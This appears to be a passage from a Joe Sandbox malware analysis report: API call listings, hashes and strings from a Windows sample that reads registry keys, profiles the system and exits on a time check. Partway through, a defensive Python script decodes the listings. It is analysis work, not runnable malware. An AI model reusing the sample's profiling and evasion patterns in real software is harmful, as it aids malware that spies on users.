                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,006C140E), ref: 006C9AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,006C140E,00000000,?,?,?,006C140E), ref: 006C9AE0
                                • LocalFree.KERNEL32(?,?,?,?,006C140E), ref: 006C9B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,006C140E), ref: 006C9B07
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 0a0efcee7d150d54189b1e19ff1321578b14b799a3a225ca5e59448661fb0e09
                                • Instruction ID: e3d6b94f5c4b48430d18f4726cab9bd6a4d53957a358ec3f9a4d20f325e971ec
                                • Opcode Fuzzy Hash: 0a0efcee7d150d54189b1e19ff1321578b14b799a3a225ca5e59448661fb0e09
                                • Instruction Fuzzy Hash: 361119B160020AAFEB10DFA9DD88FBB776DFB44744F104269F915A6280EB709D50CBB4
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E5B14
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA188
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 006E5B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 006E5B89
                                • memmove.MSVCRT(00000000,?,?), ref: 006E5B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: 6f8d22fa38f369044750938dc9f7a746c6496a90995acdab4cf56d36ab5a6fdc
                                • Instruction ID: e799982d61327523ceca6f13e533fd2b2e223a30630ae5603fb5698a872e4891
                                • Opcode Fuzzy Hash: 6f8d22fa38f369044750938dc9f7a746c6496a90995acdab4cf56d36ab5a6fdc
                                • Instruction Fuzzy Hash: AE418271B016189FCF08CF6DC995AAEB7B6EB88714F15826DE906E7344D630DD018B90
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006D7D58
                                  • Part of subcall function 006EA1C0: std::exception::exception.LIBCMT ref: 006EA1D5
                                  • Part of subcall function 006EA1C0: std::exception::exception.LIBCMT ref: 006EA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 006D7D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 006D7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: b5e8e2771bd7ca005c274fcae69ad0b85f2f5538a243c9c4a7f35eb8c5e780bf
                                • Instruction ID: 82f9a8d3710cb866f83f2397b6bae6f4159fca9ad2724197dd7665a86754a958
                                • Opcode Fuzzy Hash: b5e8e2771bd7ca005c274fcae69ad0b85f2f5538a243c9c4a7f35eb8c5e780bf
                                • Instruction Fuzzy Hash: D721A2327043044BD724DE6CD881A7AB7E7EFA1750B204A6FE492CB781E771DC4087A6
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E33EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E33F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 006E3411
                                • wsprintfA.USER32 ref: 006E3437
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 1686b5dd5b04f85e6a149541d133e0ee78ee35d08dc852212d5d6532583c2aa1
                                • Instruction ID: fa10bf28df7e2ef72353dc1eca7b0bd62f5b622a6ec612b2b7e0bc90d01e5596
                                • Opcode Fuzzy Hash: 1686b5dd5b04f85e6a149541d133e0ee78ee35d08dc852212d5d6532583c2aa1
                                • Instruction Fuzzy Hash: 9601B571A04658EFDB14DFA8DD49FBEB7B9FB45710F000129FA06E7380DB74590086A5
                                APIs
                                Strings
                                Similarity
                                • API ID: __amsg_exit$__getptdfree
                                • String ID: Xuo$Xuo
                                • API String ID: 2640026729-258060891
                                • Opcode ID: 1839987478184787e498da40164a00cb5d17544ed0b779e6e2e01362d7f447a5
                                • Instruction ID: 5b1684148bbb40a9522906a10d926c0dcacdd902cc695d83ca46be04cbe4c3e1
                                • Opcode Fuzzy Hash: 1839987478184787e498da40164a00cb5d17544ed0b779e6e2e01362d7f447a5
                                • Instruction Fuzzy Hash: E501C03291BB91AEDF51AB2E98057EEB3636F10B14F150019E90467780DBA06E81DBE9
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00F1F160,00000000,00020119,?), ref: 006DD7F5
                                • RegQueryValueExA.ADVAPI32(?,00F20658,00000000,00000000,00000000,000000FF), ref: 006DD819
                                • RegCloseKey.ADVAPI32(?), ref: 006DD823
                                • lstrcat.KERNEL32(?,00000000), ref: 006DD848
                                • lstrcat.KERNEL32(?,00F20538), ref: 006DD85C
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 2801a3d77eedb7d7ca9c669cc49984b87f1ad890317ab5336dccdcc8416ee6b0
                                • Instruction ID: 30ab1e9d2e4cd5f3513af2c4f125c896a81ac99101a1034aafce6ad7eb6396cd
                                • Opcode Fuzzy Hash: 2801a3d77eedb7d7ca9c669cc49984b87f1ad890317ab5336dccdcc8416ee6b0
                                • Instruction Fuzzy Hash: 89415EB1A1010DAFCB94EF64EC86FEE7779EB44304F404069B90997251EE30EA85CF95
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006D7F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D7F60
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006D7FA5
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006D7FD3
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006D8007
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 8c609dd09647424a6ad1c03f91d22563e407ad8a2120130a6da4c9f29cd963d6
                                • Instruction ID: 892c6a0bf592954add7d443d4eb5f5242c8f7bbef90be937d954d4e370cefde8
                                • Opcode Fuzzy Hash: 8c609dd09647424a6ad1c03f91d22563e407ad8a2120130a6da4c9f29cd963d6
                                • Instruction Fuzzy Hash: 2141A170A0411ADFCB20DF68D484EAEB7B5FF54300B11449AE805DB351EB70EA66CB92
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006D80BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D80EA
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006D8102
                                • lstrlen.KERNEL32(00000000), ref: 006D8140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D816F
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 23fb1879a9b5c59bb2efe3b60cb712333733159f6872f5a6d6fd093ba00b542b
                                • Instruction ID: e1ac449caeaf11083d7aa9249630718b879bb364761ab88d3b2272dea21c3638
                                • Opcode Fuzzy Hash: 23fb1879a9b5c59bb2efe3b60cb712333733159f6872f5a6d6fd093ba00b542b
                                • Instruction Fuzzy Hash: 0F415A75A00206EFCB21DF79DD48BAABBB5EB44700F14845EA849D7344EF34D94ACB90
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 006E1B72
                                  • Part of subcall function 006E1820: lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E184F
                                  • Part of subcall function 006E1820: lstrlen.KERNEL32(00F06F68), ref: 006E1860
                                  • Part of subcall function 006E1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006E1887
                                  • Part of subcall function 006E1820: lstrcat.KERNEL32(00000000,00000000), ref: 006E1892
                                  • Part of subcall function 006E1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006E18C1
                                  • Part of subcall function 006E1820: lstrlen.KERNEL32(006F4FA0), ref: 006E18D3
                                  • Part of subcall function 006E1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006E18F4
                                  • Part of subcall function 006E1820: lstrcat.KERNEL32(00000000,006F4FA0), ref: 006E1900
                                  • Part of subcall function 006E1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006E192F
                                • sscanf.NTDLL ref: 006E1B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 006E1BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 006E1BC6
                                • ExitProcess.KERNEL32 ref: 006E1BE3
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: 7156f4e4eb364a13fb38a643f639587360fc41a33f703ab7f3cd0f37ea7f1349
                                • Instruction ID: 6ca8dfa403a3ba63ceeb30cb99bfd4952d73eeaf060e2cd3d859d9405f125627
                                • Opcode Fuzzy Hash: 7156f4e4eb364a13fb38a643f639587360fc41a33f703ab7f3cd0f37ea7f1349
                                • Instruction Fuzzy Hash: 9121D3B1518341AF8350DF69D88496BBBF9FEC8214F408A1EF599C3220EB309604CBA6
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E3166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E316D
                                • RegOpenKeyExA.ADVAPI32(80000002,00F0B9D0,00000000,00020119,?), ref: 006E318C
                                • RegQueryValueExA.ADVAPI32(?,00F1F140,00000000,00000000,00000000,000000FF), ref: 006E31A7
                                • RegCloseKey.ADVAPI32(?), ref: 006E31B1
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 4c6d3fceabaf7711d9323d5cb284d1e940d763ca6afa7f10aeb3d4c1ebf538dc
                                • Instruction ID: 386984362a0728f088fe7cf4c9c02a487d78a793b354900a93f405f5fe6a2e01
                                • Opcode Fuzzy Hash: 4c6d3fceabaf7711d9323d5cb284d1e940d763ca6afa7f10aeb3d4c1ebf538dc
                                • Instruction Fuzzy Hash: F3116D72A00208AFD710CBA5DC49FBBBBBCF788B11F004229FA05E3680DB755900CBA1
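The API listings for the HKCU read at 006DD7F5, the GetSystemTime/ExitProcess chain at 006E1B72 and the HKLM read at 006E318C are easier to triage once the numeric arguments are decoded: 80000001 and 80000002 are the HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE predefined handles, and 00020119 is KEY_READ | KEY_WOW64_64KEY, i.e. this 32-bit image (all addresses here are 32-bit) asking for the 64-bit registry view. The Python script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses listing lines in the format used on this page, decodes those constants, and flags the GetSystemTime, sscanf, SystemTimeToFileTime x2, ExitProcess sequence as a time-gated exit. That last label is an interpretation of the recorded call order, not something the report states. The embedded sample text is copied from the three entries above. Joe Sandbox's argument columns are stack snapshots, so the 00000000,00000104 shown for GetProcessHeap (which takes no arguments) are the flags and 0x104 = 260 = MAX_PATH size of the following RtlAllocateHeap; treat decoded arguments as hints, not ground truth.

```python
"""Decode Joe Sandbox per-function API listings into readable findings.

Added example for this report; not Joe Sandbox's code and not the sample's.
SAMPLE is copied from three function entries on the page. Argument values are
the stack snapshots Joe Sandbox records, so they are hints rather than facts.
"""
import re
from dataclasses import dataclass

# Constructed from the page's own listing lines (bullets removed).
SAMPLE = """\
APIs
RegOpenKeyExA.ADVAPI32(80000001,00F1F160,00000000,00020119,?), ref: 006DD7F5
RegQueryValueExA.ADVAPI32(?,00F20658,00000000,00000000,00000000,000000FF), ref: 006DD819
RegCloseKey.ADVAPI32(?), ref: 006DD823
lstrcat.KERNEL32(?,00000000), ref: 006DD848
lstrcat.KERNEL32(?,00F20538), ref: 006DD85C
APIs
GetSystemTime.KERNEL32(?), ref: 006E1B72
sscanf.NTDLL ref: 006E1B9A
SystemTimeToFileTime.KERNEL32(?,?), ref: 006E1BB6
SystemTimeToFileTime.KERNEL32(?,?), ref: 006E1BC6
ExitProcess.KERNEL32 ref: 006E1BE3
APIs
GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E3166
RtlAllocateHeap.NTDLL(00000000), ref: 006E316D
RegOpenKeyExA.ADVAPI32(80000002,00F0B9D0,00000000,00020119,?), ref: 006E318C
RegQueryValueExA.ADVAPI32(?,00F1F140,00000000,00000000,00000000,000000FF), ref: 006E31A7
RegCloseKey.ADVAPI32(?), ref: 006E31B1
"""

# "Api.DLL(args), ref: ADDR" or "Api.DLL ref: ADDR"; 'Part of subcall' lines do not match.
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<dll>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Predefined registry handles (winreg.h).
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

KEY_READ = 0x20019  # READ_CONTROL | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY
KEY_FLAGS = [
    (0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"),
    (0x0004, "KEY_CREATE_SUB_KEY"), (0x0008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
    (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY"),
    (0x20000, "READ_CONTROL"),
]


@dataclass
class ApiCall:
    api: str
    dll: str
    args: list
    ref: str


def parse_calls(text):
    """Split the listing at each 'APIs' header; return one list of calls per function."""
    groups, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            current = []
            groups.append(current)
            continue
        m = CALL_RE.match(line)
        if not m or current is None:
            continue  # section headers, subcall lines, hashes
        args = [a for a in (m["args"] or "").split(",") if a]
        current.append(ApiCall(m["api"], m["dll"], args, m["ref"].upper()))
    return groups


def decode_hive(hex_value):
    """Map a predefined HKEY handle to its name; '?' (unrecovered) passes through."""
    try:
        return HIVES.get(int(hex_value, 16), hex_value)
    except ValueError:
        return hex_value


def decode_key_access(hex_value):
    """Expand a samDesired mask into KEY_* names, collapsing the KEY_READ composite."""
    try:
        mask = int(hex_value, 16)
    except ValueError:
        return hex_value
    names = []
    if mask & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        mask &= ~KEY_READ
    for bit, name in KEY_FLAGS:
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:
        names.append(f"0x{mask:X}")
    return "|".join(names) or "0"


def describe(calls):
    """Findings for one function, derived only from the recorded API sequence."""
    apis = {c.api for c in calls}
    findings = []
    for c in calls:
        if c.api in ("RegOpenKeyExA", "RegOpenKeyExW") and len(c.args) >= 4:
            findings.append(f"opens {decode_hive(c.args[0])} with {decode_key_access(c.args[3])}")
    if "RegQueryValueExA" in apis and "lstrcat" in apis:
        findings.append("registry value is appended to another string via lstrcat")
    if {"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"} <= apis:
        findings.append("time-gated termination: current time and a parsed value both become FILETIME before ExitProcess")
    return findings


def analyze(text):
    """Key each function's findings by the address of its first recorded call."""
    return {calls[0].ref: describe(calls) for calls in parse_calls(text) if calls}


if __name__ == "__main__":
    for ref, findings in analyze(SAMPLE).items():
        print(ref, "->", "; ".join(findings) or "no heuristic match")
```

Run it on the raw text of a function entry (the bullets are stripped for you) to get one line per function; anything Joe Sandbox shows as `?` is passed through unchanged rather than guessed.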
                                APIs
                                Strings
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 8eb318d3f1b8c17e9640c6787923384909d13ecc2fdb5b5a4b991364c20a47d0
                                • Instruction ID: c6e619aa2c8eb140984990dd1a6cca6d5919281fba79d86a8e0a20fb8c3a9072
                                • Opcode Fuzzy Hash: 8eb318d3f1b8c17e9640c6787923384909d13ecc2fdb5b5a4b991364c20a47d0
                                • Instruction Fuzzy Hash: 1D41E4705057DCAEDF218B268C85FFB7BFA9F45344F1444E8EA8686182E2719B458F34
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C8996
                                  • Part of subcall function 006EA1C0: std::exception::exception.LIBCMT ref: 006EA1D5
                                  • Part of subcall function 006EA1C0: std::exception::exception.LIBCMT ref: 006EA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C89CD
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA188
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA1AE
                                Strings
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: f722fa67fb41a73d9eb10218214063a7dcc8512100e4cdbcc98ae604f3c051d8
                                • Instruction ID: 3833fac069cc608b1ba62952e9cb77a3a0fab7113fc614b8787caccf85464eb5
                                • Opcode Fuzzy Hash: f722fa67fb41a73d9eb10218214063a7dcc8512100e4cdbcc98ae604f3c051d8
                                • Instruction Fuzzy Hash: 5A2180723006509FC7309A9DE840FBAF7AADBA1761B15096FF156CB681CA71DC41C3AA
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C8883
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA188
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA1AE
                                Strings
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 421400f5196e3feb80e7a006897fcb0cebf243e8fa2b503da748e95f28665bdb
                                • Instruction ID: a07ee958090e8ecc88cedaba59c190b85b5a17e8f6c79dbb6285b250838fdd0d
                                • Opcode Fuzzy Hash: 421400f5196e3feb80e7a006897fcb0cebf243e8fa2b503da748e95f28665bdb
                                • Instruction Fuzzy Hash: FD3197B5E005159FCB18DF58C891BAEBBB6EB88350F14826DE9159F385DB30AD01CB91
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E5922
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA188
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E5935
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: 066287a3c8543959d8fa17e47d2db91ed332d07d180b2eac0a24aa40304025c3
                                • Instruction ID: 74ac79bbd015f8590fc042c861eae7e2f9fa4546ecab6d45c4268b3e117ab0b5
                                • Opcode Fuzzy Hash: 066287a3c8543959d8fa17e47d2db91ed332d07d180b2eac0a24aa40304025c3
                                • Instruction Fuzzy Hash: 54113031305BC0CBC7318B2DE840B9A77E3AB92765F250A9DF0D28B796DB61D841C7A5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,006EA430,000000FF), ref: 006E3D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E3D27
                                • wsprintfA.USER32 ref: 006E3D37
                                  • Part of subcall function 006E71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006E71FE
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 5a3d39e2c1732242f56be373cd06d0cb91b001c21a46f12e34a809f6df1d56bb
                                • Instruction ID: f2b1fa0b6ea81e732041c5ead3c92a34d65ace327028e80959482045d58047f0
                                • Opcode Fuzzy Hash: 5a3d39e2c1732242f56be373cd06d0cb91b001c21a46f12e34a809f6df1d56bb
                                • Instruction Fuzzy Hash: 1B01CC72640B54FFE7209BA5DC0EF7ABBA8FB85B61F100115FA05972D0CBB41900CAA5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C8737
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA188
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA1AE
                                Strings
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 28af8a4a1c8b3de0da79547a859bebb8b76945833f615f7fc44bfb32d79937ef
                                • Instruction ID: 6379dad86ccdc683ae897e36551956bfc62497ec6af9191077344d05c9a34054
                                • Opcode Fuzzy Hash: 28af8a4a1c8b3de0da79547a859bebb8b76945833f615f7fc44bfb32d79937ef
                                • Instruction Fuzzy Hash: A4F09037B400210F8364643D8D849AEA947D6E539033AD769E91AEF399EC70EC8285E4
                                APIs
                                  • Part of subcall function 006E781C: __mtinitlocknum.LIBCMT ref: 006E7832
                                  • Part of subcall function 006E781C: __amsg_exit.LIBCMT ref: 006E783E
                                • ___addlocaleref.LIBCMT ref: 006E8756
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$Xuo$xto
                                • API String ID: 3105635775-2015942664
                                • Opcode ID: 335b1d0f498b33ca82b1067dfb52f80a275dffc2b26ff78407bf55845077cbec
                                • Instruction ID: f14839fdefceb4515f3ff3e6f117a3378dd975e0e1dfd12bb421af02063e7e6e
                                • Opcode Fuzzy Hash: 335b1d0f498b33ca82b1067dfb52f80a275dffc2b26ff78407bf55845077cbec
                                • Instruction Fuzzy Hash: 7A01D671446B40DED760AF7AD80575BFBE1AF10324F20891DE1DA576E0CFB0AA44CB54
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DE544
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE573
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE581
